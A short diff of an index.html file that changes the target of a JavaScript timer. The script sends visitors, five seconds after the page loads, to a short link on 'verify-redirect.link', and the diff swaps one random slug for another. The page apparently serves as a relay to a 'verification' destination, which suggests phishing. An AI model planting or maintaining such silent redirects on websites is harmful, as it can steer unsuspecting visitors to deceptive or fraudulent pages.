--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
   <head>
     <script>
       setTimeout(function() {
-          window.location.href = "https://verify-redirect.link/HRQQh5";
+          window.location.href = "https://verify-redirect.link/Z7Pd8k";
       }, 5000); // 5000 milliseconds = 5 seconds
   </script>
   
